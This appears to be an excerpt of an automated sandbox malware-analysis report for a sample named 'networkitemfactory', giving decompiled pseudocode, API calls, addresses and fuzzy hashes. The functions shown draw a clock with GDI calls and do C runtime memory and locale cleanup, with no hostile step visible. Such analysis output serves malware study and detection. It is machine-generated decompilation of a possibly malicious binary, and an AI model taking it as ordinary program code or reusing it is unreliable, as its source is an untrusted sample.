                                                                                                      • Instruction ID: 201b8f6032eaa1f4d38bc2e805cd0a82f907350239d40423b13d8945d61c76b7
                                                                                                      • Opcode Fuzzy Hash: 1c2fea9a4649ad5569de1717745718e8fbf6f0c4d96ecaba2659b31418f3cf6a
                                                                                                      • Instruction Fuzzy Hash: 6B8180719045089AEB24E779CC56BEEB768EB11314F50447FE042B31D2DF7C6A448B9E
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 60%
                                                                                                      			E00401460(void* __ecx) {
                                                                                                      				signed int _v8;
                                                                                                      				struct _SYSTEMTIME _v24;
                                                                                                      				struct HDC__* _v28;
                                                                                                      				signed int _v32;
                                                                                                      				void* __ebx;
                                                                                                      				void* __edi;
                                                                                                      				void* __esi;
                                                                                                      				signed int _t60;
                                                                                                      				signed short _t65;
                                                                                                      				void* _t105;
                                                                                                      				signed int _t109;
                                                                                                      				signed int _t120;
                                                                                                      				signed int _t123;
                                                                                                      				signed int _t125;
                                                                                                      				void* _t127;
                                                                                                      				signed int _t128;
                                                                                                      				struct HDC__* _t130;
                                                                                                      				signed int _t133;
                                                                                                      				signed int _t136;
                                                                                                      				struct HDC__* _t137;
                                                                                                      				signed int _t140;
                                                                                                      				signed int _t141;
                                                                                                      
                                                                                                      				_t60 =  *0x435040; // 0x35ed344a
                                                                                                      				_v8 = _t60 ^ _t141;
                                                                                                      				_t105 = __ecx;
                                                                                                      				_t130 = GetDC( *(__ecx + 0x18));
                                                                                                      				_v28 = _t130;
                                                                                                      				GetLocalTime( &_v24);
                                                                                                      				StretchBlt(_t130, 0, 0, 0x6f, 0x15,  *(_t105 + 0x10), 0xaa, 0, 2, 0x15, 0xcc0020);
                                                                                                      				if( *((char*)(_t105 + 0x1c)) != 0) {
                                                                                                      					_t65 = _v24.wHour;
                                                                                                      					_t120 = _t65 & 0x0000ffff;
                                                                                                      					if(_t65 > 0xc) {
                                                                                                      						_t120 = _t120 - 0xc;
                                                                                                      					}
                                                                                                      					_t109 = (0x66666667 * _t120 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t120 >> 0x20 >> 2);
                                                                                                      					_v32 = _t120 - _t109 + _t109 * 4 + _t109 + _t109 * 4;
                                                                                                      					BitBlt(_t130, 2, 0, 0xd, 0x15,  *(_t105 + 0x10), _t109 * 0xd, 0, 0xcc0020);
                                                                                                      					BitBlt(_t130, 0xf, 0, 0xd, 0x15,  *(_t105 + 0x10), _v32 * 0xd, 0, 0xcc0020);
                                                                                                      				} else {
                                                                                                      					_t128 = _v24.wHour & 0x0000ffff;
                                                                                                      					_t140 = (0x66666667 * _t128 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t128 >> 0x20 >> 2);
                                                                                                      					BitBlt(_v28, 2, 0, 0xd, 0x15,  *(_t105 + 0x10), _t140 * 0xd, 0, 0xcc0020);
                                                                                                      					BitBlt(_v28, 0xf, 0, 0xd, 0x15,  *(_t105 + 0x10), (_t128 - _t140 + _t140 * 4 + _t140 + _t140 * 4) * 0xd, 0, 0xcc0020);
                                                                                                      				}
                                                                                                      				_t123 = _v24.wMinute & 0x0000ffff;
                                                                                                      				_t133 = (0x66666667 * _t123 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t123 >> 0x20 >> 2);
                                                                                                      				BitBlt(_v28, 0x23, 0, 0xd, 0x15,  *(_t105 + 0x10), _t133 * 0xd, 0, 0xcc0020);
                                                                                                      				BitBlt(_v28, 0x30, 0, 0xd, 0x15,  *(_t105 + 0x10), (_t123 - _t133 + _t133 * 4 + _t133 + _t133 * 4) * 0xd, 0, 0xcc0020);
                                                                                                      				_t125 = _v24.wSecond & 0x0000ffff;
                                                                                                      				_t117 = 0x66666667 * _t125 >> 0x20 >> 2;
                                                                                                      				_t136 = (0x66666667 * _t125 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t125 >> 0x20 >> 2);
                                                                                                      				BitBlt(_v28, 0x44, 0, 0xd, 0x15,  *(_t105 + 0x10), _t136 * 0xd, 0, 0xcc0020);
                                                                                                      				_t137 = _v28;
                                                                                                      				_t127 = BitBlt;
                                                                                                      				BitBlt(_t137, 0x51, 0, 0xd, 0x15,  *(_t105 + 0x10), (_t125 - _t136 + _t136 * 4 + _t136 + _t136 * 4) * 0xd, 0, 0xcc0020);
                                                                                                      				_push(0xcc0020);
                                                                                                      				_push(0);
                                                                                                      				if(_v24.wMilliseconds <= 0x1f4) {
                                                                                                      					BitBlt(_t137, 0x1c, 0, 7, 0x15,  *(_t105 + 0x10), 0xa3, ??, ??);
                                                                                                      					_push(0xcc0020);
                                                                                                      					_push(0);
                                                                                                      					_push(0xa3);
                                                                                                      				} else {
                                                                                                      					BitBlt(_t137, 0x1c, 0, 7, 0x15,  *(_t105 + 0x10), 0x9c, ??, ??);
                                                                                                      					_push(0xcc0020);
                                                                                                      					_push(0);
                                                                                                      					_push(0x9c);
                                                                                                      				}
                                                                                                      				BitBlt(_t137, 0x3d, 0, 7, 0x15,  *(_t105 + 0x10), ??, ??, ??);
                                                                                                      				if( *((char*)(_t105 + 0x1c)) == 1) {
                                                                                                      					_push(0xcc0020);
                                                                                                      					_push(0);
                                                                                                      					if(_v24.wHour < 0xc) {
                                                                                                      						_push(0x82);
                                                                                                      					} else {
                                                                                                      						_push(0x8f);
                                                                                                      					}
                                                                                                      					BitBlt(_t137, 0x60, 0, 0xd, 0x15,  *(_t105 + 0x10), ??, ??, ??);
                                                                                                      				}
                                                                                                      				ReleaseDC( *(_t105 + 0x18), _t137);
                                                                                                      				return E004023FF(_t105, _v8 ^ _t141, _t117, _t127, _t137);
                                                                                                      			}

























                                                                                                      0x00401466
                                                                                                      0x0040146d
                                                                                                      0x00401472
                                                                                                      0x0040147e
                                                                                                      0x00401484
                                                                                                      0x00401487
                                                                                                      0x004014a9
                                                                                                      0x004014b3
                                                                                                      0x00401511
                                                                                                      0x00401515
                                                                                                      0x00401521
                                                                                                      0x00401523
                                                                                                      0x00401523
                                                                                                      0x00401535
                                                                                                      0x00401543
                                                                                                      0x00401559
                                                                                                      0x00401573
                                                                                                      0x004014b5
                                                                                                      0x004014b5
                                                                                                      0x004014cd
                                                                                                      0x004014e3
                                                                                                      0x00401509
                                                                                                      0x00401509
                                                                                                      0x00401575
                                                                                                      0x0040158d
                                                                                                      0x004015a3
                                                                                                      0x004015c9
                                                                                                      0x004015cf
                                                                                                      0x004015df
                                                                                                      0x004015e7
                                                                                                      0x004015fd
                                                                                                      0x00401606
                                                                                                      0x00401617
                                                                                                      0x0040162a
                                                                                                      0x00401631
                                                                                                      0x00401636
                                                                                                      0x0040163c
                                                                                                      0x00401670
                                                                                                      0x00401672
                                                                                                      0x00401677
                                                                                                      0x00401679
                                                                                                      0x0040163e
                                                                                                      0x0040164f
                                                                                                      0x00401651
                                                                                                      0x00401656
                                                                                                      0x00401658
                                                                                                      0x00401658
                                                                                                      0x0040168a
                                                                                                      0x00401690
                                                                                                      0x00401697
                                                                                                      0x0040169c
                                                                                                      0x0040169e
                                                                                                      0x004016a7
                                                                                                      0x004016a0
                                                                                                      0x004016a0
                                                                                                      0x004016a0
                                                                                                      0x004016b8
                                                                                                      0x004016b8
                                                                                                      0x004016be
                                                                                                      0x004016d4

                                                                                                      APIs
                                                                                                      • GetDC.USER32(?), ref: 00401478
                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00401487
                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,0000006F,00000015,?,000000AA,00000000,00000002,00000015,00CC0020), ref: 004014A9
                                                                                                      • BitBlt.GDI32(?,00000002,00000000,0000000D,00000015,?,66666667,00000000,00CC0020), ref: 004014E3
                                                                                                      • BitBlt.GDI32(?,0000000F,00000000,0000000D,00000015,?,00000000,00000000,00CC0020), ref: 00401509
                                                                                                      • BitBlt.GDI32(00000000,00000002,00000000,0000000D,00000015,?,66666667,00000000,00CC0020), ref: 00401559
                                                                                                      • BitBlt.GDI32(00000000,0000000F,00000000,0000000D,00000015,?,00000000,00000000,00CC0020), ref: 00401573
                                                                                                      • BitBlt.GDI32(?,00000023,00000000,0000000D,00000015,?,66666667,00000000,00CC0020), ref: 004015A3
                                                                                                      • BitBlt.GDI32(?,00000030,00000000,0000000D,00000015,?,00000000,00000000,00CC0020), ref: 004015C9
                                                                                                      • BitBlt.GDI32(?,00000044,00000000,0000000D,00000015,?,66666667,00000000,00CC0020), ref: 004015FD
                                                                                                      • BitBlt.GDI32(?,00000051,00000000,0000000D,00000015,?,00000000,00000000,00CC0020), ref: 0040162A
                                                                                                      • BitBlt.GDI32(?,0000001C,00000000,00000007,00000015,?,0000009C,00000000,00CC0020), ref: 0040164F
                                                                                                      • BitBlt.GDI32(?,0000001C,00000000,00000007,00000015,?,000000A3,00000000,00CC0020), ref: 00401670
                                                                                                      • BitBlt.GDI32(?,0000003D,00000000,00000007,00000015,?,000000A3,00000000,00CC0020), ref: 0040168A
                                                                                                      • BitBlt.GDI32(?,00000060,00000000,0000000D,00000015,?,00000082,00000000,00CC0020), ref: 004016B8
                                                                                                      • ReleaseDC.USER32 ref: 004016BE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LocalReleaseStretchTime
                                                                                                      • String ID: gfff$gfff$gfff$gfff$@bw
                                                                                                      • API String ID: 3873728368-1481070139
                                                                                                      • Opcode ID: 2bac2e643f9ae310b9b1c5671be892aa5c7a774fda8b0812f5c359b49242290a
                                                                                                      • Instruction ID: 8369255b4d5222c7f4210ed0fb5063c9b8c6610f14c435b30fd9e32c564ce736
                                                                                                      • Opcode Fuzzy Hash: 2bac2e643f9ae310b9b1c5671be892aa5c7a774fda8b0812f5c359b49242290a
                                                                                                      • Instruction Fuzzy Hash: B4717332B80708BBFB349F55DD0BF6A7A69EB84B00F150065FB10BE1D2D2F599109B99
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 75%
                                                                                                      			E0040392E(void* __eax, void* __ebx) {
                                                                                                      				intOrPtr _t5;
                                                                                                      				intOrPtr _t6;
                                                                                                      				intOrPtr _t7;
                                                                                                      				intOrPtr _t8;
                                                                                                      				void* _t9;
                                                                                                      				void* _t14;
                                                                                                      				void* _t24;
                                                                                                      				intOrPtr* _t25;
                                                                                                      				signed int _t26;
                                                                                                      				signed int _t27;
                                                                                                      				intOrPtr _t39;
                                                                                                      
                                                                                                      				_t14 = __ebx;
                                                                                                      				__imp__DecodePointer( *0x438c08);
                                                                                                      				_t25 =  *0x436d08; // 0x0
                                                                                                      				_t24 = __eax;
                                                                                                      				if(_t25 == 0) {
                                                                                                      					L4:
                                                                                                      					_push(_t14);
                                                                                                      					E00402CB3(_t25);
                                                                                                      					_t26 =  *0x436d04;
                                                                                                      					 *0x436d08 = 0;
                                                                                                      					if(_t26 == 0) {
                                                                                                      						L8:
                                                                                                      						E00402CB3(_t26);
                                                                                                      						 *0x436d04 = 0;
                                                                                                      						E00402CB3( *0x436d00);
                                                                                                      						_t5 = E00402CB3( *0x436cfc);
                                                                                                      						_t27 = _t26 | 0xffffffff;
                                                                                                      						 *0x436d00 = 0;
                                                                                                      						 *0x436cfc = 0;
                                                                                                      						if(_t24 != _t27) {
                                                                                                      							_t39 =  *0x438c08; // 0x15700eec
                                                                                                      							if(_t39 != 0) {
                                                                                                      								_t5 = E00402CB3(_t24);
                                                                                                      							}
                                                                                                      						}
                                                                                                      						__imp__EncodePointer(_t27);
                                                                                                      						 *0x438c08 = _t5;
                                                                                                      						_t6 =  *0x437774; // 0x0
                                                                                                      						if(_t6 != 0) {
                                                                                                      							E00402CB3(_t6);
                                                                                                      							 *0x437774 = 0;
                                                                                                      						}
                                                                                                      						_t7 =  *0x437778; // 0x0
                                                                                                      						if(_t7 != 0) {
                                                                                                      							E00402CB3(_t7);
                                                                                                      							 *0x437778 = 0;
                                                                                                      						}
                                                                                                      						_t8 =  *0x435794; // 0x536ce0
                                                                                                      						asm("lock xadd [eax], esi");
                                                                                                      						if(_t27 != 1) {
                                                                                                      							L18:
                                                                                                      							return _t8;
                                                                                                      						} else {
                                                                                                      							_t8 =  *0x435794; // 0x536ce0
                                                                                                      							if(_t8 == 0x435570) {
                                                                                                      								goto L18;
                                                                                                      							}
                                                                                                      							_t9 = E00402CB3(_t8);
                                                                                                      							 *0x435794 = 0x435570;
                                                                                                      							return _t9;
                                                                                                      						}
                                                                                                      					}
                                                                                                      					while( *_t26 != 0) {
                                                                                                      						E00402CB3( *_t26);
                                                                                                      						_t26 = _t26 + 4;
                                                                                                      						if(_t26 != 0) {
                                                                                                      							continue;
                                                                                                      						}
                                                                                                      						break;
                                                                                                      					}
                                                                                                      					_t26 =  *0x436d04;
                                                                                                      					goto L8;
                                                                                                      				}
                                                                                                      				while( *_t25 != 0) {
                                                                                                      					E00402CB3( *_t25);
                                                                                                      					_t25 = _t25 + 4;
                                                                                                      					if(_t25 != 0) {
                                                                                                      						continue;
                                                                                                      					}
                                                                                                      					break;
                                                                                                      				}
                                                                                                      				_t25 =  *0x436d08; // 0x0
                                                                                                      				goto L4;
                                                                                                      			}














                                                                                                      0x0040392e
                                                                                                      0x00403936
                                                                                                      0x0040393c
                                                                                                      0x00403942
                                                                                                      0x00403946
                                                                                                      0x00403960
                                                                                                      0x00403960
                                                                                                      0x00403962
                                                                                                      0x00403967
                                                                                                      0x0040396f
                                                                                                      0x00403978
                                                                                                      0x00403991
                                                                                                      0x00403992
                                                                                                      0x0040399d
                                                                                                      0x004039a3
                                                                                                      0x004039ae
                                                                                                      0x004039b3
                                                                                                      0x004039b6
                                                                                                      0x004039bf
                                                                                                      0x004039c7
                                                                                                      0x004039c9
                                                                                                      0x004039cf
                                                                                                      0x004039d2
                                                                                                      0x004039d7
                                                                                                      0x004039cf
                                                                                                      0x004039d9
                                                                                                      0x004039df
                                                                                                      0x004039e4
                                                                                                      0x004039eb
                                                                                                      0x004039ee
                                                                                                      0x004039f4
                                                                                                      0x004039f4
                                                                                                      0x004039fa
                                                                                                      0x00403a01
                                                                                                      0x00403a04
                                                                                                      0x00403a0a
                                                                                                      0x00403a0a
                                                                                                      0x00403a10
                                                                                                      0x00403a15
                                                                                                      0x00403a1b
                                                                                                      0x00403a3a
                                                                                                      0x00403a3a
                                                                                                      0x00403a1d
                                                                                                      0x00403a1d
                                                                                                      0x00403a29
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00403a2c
                                                                                                      0x00403a32
                                                                                                      0x00000000
                                                                                                      0x00403a32
                                                                                                      0x00403a1b
                                                                                                      0x0040397a
                                                                                                      0x00403980
                                                                                                      0x00403986
                                                                                                      0x00403989
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00403989
                                                                                                      0x0040398b
                                                                                                      0x00000000
                                                                                                      0x0040398b
                                                                                                      0x00403948
                                                                                                      0x0040394f
                                                                                                      0x00403955
                                                                                                      0x00403958
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00403958
                                                                                                      0x0040395a
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • DecodePointer.KERNEL32 ref: 00403936
                                                                                                      • _free.LIBCMT ref: 0040394F
                                                                                                        • Part of subcall function 00402CB3: HeapFree.KERNEL32(00000000,00000000,?,00406DD2,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00402CC7
                                                                                                        • Part of subcall function 00402CB3: GetLastError.KERNEL32(xuC,?,00406DD2,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00402CD9
                                                                                                      • _free.LIBCMT ref: 00403962
                                                                                                      • _free.LIBCMT ref: 00403980
                                                                                                      • _free.LIBCMT ref: 00403992
                                                                                                      • _free.LIBCMT ref: 004039A3
                                                                                                      • _free.LIBCMT ref: 004039AE
                                                                                                      • _free.LIBCMT ref: 004039D2
                                                                                                      • EncodePointer.KERNEL32(0052E980), ref: 004039D9
                                                                                                      • _free.LIBCMT ref: 004039EE
                                                                                                      • _free.LIBCMT ref: 00403A04
                                                                                                      • _free.LIBCMT ref: 00403A2C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                      • String ID: pUC$lS
                                                                                                      • API String ID: 3064303923-4220208505
                                                                                                      • Opcode ID: 9e368f96e69a788bf5f9fe72ec27c00b85b73d030a192da84a46a16c3714cec0
                                                                                                      • Instruction ID: 2d5ff0e81fdfeecdb028d6274274e2617790129ccf2f9e9fb2bc5b6500c7a3d5
                                                                                                      • Opcode Fuzzy Hash: 9e368f96e69a788bf5f9fe72ec27c00b85b73d030a192da84a46a16c3714cec0
                                                                                                      • Instruction Fuzzy Hash: F121D0B2A05652ABEB225F25FE4455A7BA8FB00321715607FF844B73E0CB785D408F9C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 77%
                                                                                                      			E00413B7F(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                      				void* __edi;
                                                                                                      				void* __esi;
                                                                                                      				void* __ebp;
                                                                                                      				intOrPtr _t12;
                                                                                                      				intOrPtr _t13;
                                                                                                      				intOrPtr _t15;
                                                                                                      				intOrPtr _t22;
                                                                                                      				intOrPtr* _t42;
                                                                                                      
                                                                                                      				if(_a4 > 5 || _a8 == 0) {
                                                                                                      					L4:
                                                                                                      					return 0;
                                                                                                      				} else {
                                                                                                      					_t42 = E0040CFF1(8, 1);
                                                                                                      					if(_t42 != 0) {
                                                                                                      						_t12 = E0040CFF1(0xb8, 1);
                                                                                                      						 *_t42 = _t12;
                                                                                                      						__eflags = _t12;
                                                                                                      						if(_t12 != 0) {
                                                                                                      							_t13 = E0040CFF1(0x220, 1);
                                                                                                      							 *((intOrPtr*)(_t42 + 4)) = _t13;
                                                                                                      							__eflags = _t13;
                                                                                                      							if(_t13 != 0) {
                                                                                                      								E00413694( *_t42, 0x4359f8);
                                                                                                      								_t15 = E00413F7F(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
                                                                                                      								_push( *((intOrPtr*)(_t42 + 4)));
                                                                                                      								__eflags = _t15;
                                                                                                      								if(__eflags == 0) {
                                                                                                      									L14:
                                                                                                      									E00402CB3();
                                                                                                      									E0040E7B6( *_t42);
                                                                                                      									E0040E65C( *_t42);
                                                                                                      									E00402CB3(_t42);
                                                                                                      									_t42 = 0;
                                                                                                      									L16:
                                                                                                      									return _t42;
                                                                                                      								}
                                                                                                      								_push( *((intOrPtr*)( *_t42 + 4)));
                                                                                                      								_t22 = E0040DF62(__edx, 1, __eflags);
                                                                                                      								__eflags = _t22;
                                                                                                      								if(_t22 == 0) {
                                                                                                      									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
                                                                                                      									goto L16;
                                                                                                      								}
                                                                                                      								_push( *((intOrPtr*)(_t42 + 4)));
                                                                                                      								goto L14;
                                                                                                      							}
                                                                                                      							E00402CB3( *_t42);
                                                                                                      							E00402CB3(_t42);
                                                                                                      							L8:
                                                                                                      							goto L3;
                                                                                                      						}
                                                                                                      						E00402CB3(_t42);
                                                                                                      						goto L8;
                                                                                                      					}
                                                                                                      					L3:
                                                                                                      					 *((intOrPtr*)(E00403FAC())) = 0xc;
                                                                                                      					goto L4;
                                                                                                      				}
                                                                                                      			}











                                                                                                      0x00413b88
                                                                                                      0x00413bae
                                                                                                      0x00000000
                                                                                                      0x00413b90
                                                                                                      0x00413b9b
                                                                                                      0x00413ba1
                                                                                                      0x00413bba
                                                                                                      0x00413bbf
                                                                                                      0x00413bc3
                                                                                                      0x00413bc5
                                                                                                      0x00413bd6
                                                                                                      0x00413bdb
                                                                                                      0x00413be0
                                                                                                      0x00413be2
                                                                                                      0x00413bfb
                                                                                                      0x00413c08
                                                                                                      0x00413c10
                                                                                                      0x00413c13
                                                                                                      0x00413c15
                                                                                                      0x00413c2a
                                                                                                      0x00413c2a
                                                                                                      0x00413c31
                                                                                                      0x00413c38
                                                                                                      0x00413c3e
                                                                                                      0x00413c46
                                                                                                      0x00413c4f
                                                                                                      0x00000000
                                                                                                      0x00413c4f
                                                                                                      0x00413c19
                                                                                                      0x00413c1c
                                                                                                      0x00413c23
                                                                                                      0x00413c25
                                                                                                      0x00413c4d
                                                                                                      0x00000000
                                                                                                      0x00413c4d
                                                                                                      0x00413c27
                                                                                                      0x00000000
                                                                                                      0x00413c27
                                                                                                      0x00413be6
                                                                                                      0x00413bec
                                                                                                      0x00413bcd
                                                                                                      0x00000000
                                                                                                      0x00413bcd
                                                                                                      0x00413bc8
                                                                                                      0x00000000
                                                                                                      0x00413bc8
                                                                                                      0x00413ba3
                                                                                                      0x00413ba8
                                                                                                      0x00000000
                                                                                                      0x00413ba8

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                      • String ID:
                                                                                                      • API String ID: 1503006713-0
                                                                                                      • Opcode ID: 24c83f02682986b5a658c73e614b9f1ff3bed2990c2cbe72f34b9a537931d441
                                                                                                      • Instruction ID: ae6e16b3023edc39ad57d468ef94e2b8fd466f6482efcdffcca20402270c21c8
                                                                                                      • Opcode Fuzzy Hash: 24c83f02682986b5a658c73e614b9f1ff3bed2990c2cbe72f34b9a537931d441
                                                                                                      • Instruction Fuzzy Hash: 17212532108A01EAE7323F26DD06A8A7BA4DF40716F10403FF448761D2EA3D9A50965D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 84%
                                                                                                      			E00413C56(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                                                                                                      				signed int _v8;
                                                                                                      				signed int _v32;
                                                                                                      				intOrPtr _v36;
                                                                                                      				signed int _v40;
                                                                                                      				void* _t38;
                                                                                                      				signed int _t45;
                                                                                                      				signed int _t60;
                                                                                                      				intOrPtr _t77;
                                                                                                      				void* _t80;
                                                                                                      				intOrPtr* _t82;
                                                                                                      				signed int _t83;
                                                                                                      				signed int _t86;
                                                                                                      				intOrPtr _t88;
                                                                                                      				void* _t92;
                                                                                                      
                                                                                                      				_t80 = __edx;
                                                                                                      				_push(__ebx);
                                                                                                      				_push(__esi);
                                                                                                      				_t86 = 0;
                                                                                                      				if(_a12 <= 0) {
                                                                                                      					L5:
                                                                                                      					return _t38;
                                                                                                      				} else {
                                                                                                      					_push(__edi);
                                                                                                      					_t82 =  &_a12;
                                                                                                      					while(1) {
                                                                                                      						_t82 = _t82 + 4;
                                                                                                      						_t38 = E0040E224(_a4, _a8,  *_t82);
                                                                                                      						_t92 = _t92 + 0xc;
                                                                                                      						if(_t38 != 0) {
                                                                                                      							break;
                                                                                                      						}
                                                                                                      						_t86 = _t86 + 1;
                                                                                                      						if(_t86 < _a12) {
                                                                                                      							continue;
                                                                                                      						} else {
                                                                                                      							goto L5;
                                                                                                      						}
                                                                                                      						goto L20;
                                                                                                      					}
                                                                                                      					_push(0);
                                                                                                      					_push(0);
                                                                                                      					_push(0);
                                                                                                      					_push(0);
                                                                                                      					_push(0);
                                                                                                      					E00406C1E(0, _t80);
                                                                                                      					asm("int3");
                                                                                                      					_push(0x14);
                                                                                                      					_push(0x434758);
                                                                                                      					E00406830(0, _t82, _t86);
                                                                                                      					_t66 = 0;
                                                                                                      					_v32 = 0;
                                                                                                      					__eflags = _a4 - 5;
                                                                                                      					if(_a4 <= 5) {
                                                                                                      						_t88 = E00404224();
                                                                                                      						_v36 = _t88;
                                                                                                      						E0040E856(0, _t80, _t82, _t88, __eflags);
                                                                                                      						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                                                                                                      						_v8 = _v8 & 0;
                                                                                                      						_t83 = E0040CFF1(0xb8, 1);
                                                                                                      						_v40 = _t83;
                                                                                                      						__eflags = _t83;
                                                                                                      						if(_t83 != 0) {
                                                                                                      							E00406D5B(0xc);
                                                                                                      							_v8 = 1;
                                                                                                      							E00413694(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                                                                                                      							_v8 = _v8 & 0x00000000;
                                                                                                      							E00413DCB();
                                                                                                      							_t66 = E00413F7F(0, _t80, _t83, _t88, _t83, _a4, _a8);
                                                                                                      							_v32 = _t66;
                                                                                                      							__eflags = _t66;
                                                                                                      							if(_t66 == 0) {
                                                                                                      								E0040E7B6(_t83);
                                                                                                      								_t43 = E0040E65C(_t83);
                                                                                                      							} else {
                                                                                                      								__eflags = _a8;
                                                                                                      								if(_a8 != 0) {
                                                                                                      									_t60 = E00418AEC(_a8, 0x43588c);
                                                                                                      									__eflags = _t60;
                                                                                                      									if(_t60 != 0) {
                                                                                                      										 *0x4377a8 = 1;
                                                                                                      									}
                                                                                                      								}
                                                                                                      								E00406D5B(0xc);
                                                                                                      								_v8 = 2;
                                                                                                      								_t25 = _t88 + 0x6c; // 0x6c
                                                                                                      								E0040E8D6(_t25, _t83);
                                                                                                      								E0040E7B6(_t83);
                                                                                                      								__eflags =  *(_t88 + 0x70) & 0x00000002;
                                                                                                      								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                                                                                                      									__eflags =  *0x435d60 & 0x00000001;
                                                                                                      									if(( *0x435d60 & 0x00000001) == 0) {
                                                                                                      										E0040E8D6(0x4359f4,  *((intOrPtr*)(_t88 + 0x6c)));
                                                                                                      										_t77 =  *0x4359f4; // 0x4359f8
                                                                                                      										_t32 = _t77 + 0x84; // 0x435d70
                                                                                                      										 *0x435d68 =  *_t32;
                                                                                                      										_t33 = _t77 + 0x90; // 0x430d60
                                                                                                      										 *0x435dc4 =  *_t33;
                                                                                                      										_t34 = _t77 + 0x74; // 0x1
                                                                                                      										 *0x435888 =  *_t34;
                                                                                                      									}
                                                                                                      								}
                                                                                                      								_v8 = _v8 & 0x00000000;
                                                                                                      								_t43 = E00413DDA();
                                                                                                      							}
                                                                                                      						}
                                                                                                      						_v8 = 0xfffffffe;
                                                                                                      						E00413E0D(_t43, _t88);
                                                                                                      						_t45 = _t66;
                                                                                                      					} else {
                                                                                                      						 *((intOrPtr*)(E00403FAC())) = 0x16;
                                                                                                      						E00406BF3();
                                                                                                      						_t45 = 0;
                                                                                                      					}
                                                                                                      					return E00406875(_t45);
                                                                                                      				}
                                                                                                      				L20:
                                                                                                      			}

















                                                                                                      0x00413c56
                                                                                                      0x00413c59
                                                                                                      0x00413c5c
                                                                                                      0x00413c5d
                                                                                                      0x00413c62
                                                                                                      0x00413c86
                                                                                                      0x00413c89
                                                                                                      0x00413c64
                                                                                                      0x00413c64
                                                                                                      0x00413c65
                                                                                                      0x00413c68
                                                                                                      0x00413c68
                                                                                                      0x00413c73
                                                                                                      0x00413c78
                                                                                                      0x00413c7d
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00413c7f
                                                                                                      0x00413c83
                                                                                                      0x00000000
                                                                                                      0x00413c85
                                                                                                      0x00000000
                                                                                                      0x00413c85
                                                                                                      0x00000000
                                                                                                      0x00413c83
                                                                                                      0x00413c8a
                                                                                                      0x00413c8b
                                                                                                      0x00413c8c
                                                                                                      0x00413c8d
                                                                                                      0x00413c8e
                                                                                                      0x00413c8f
                                                                                                      0x00413c94
                                                                                                      0x00413c95
                                                                                                      0x00413c97
                                                                                                      0x00413c9c
                                                                                                      0x00413ca1
                                                                                                      0x00413ca3
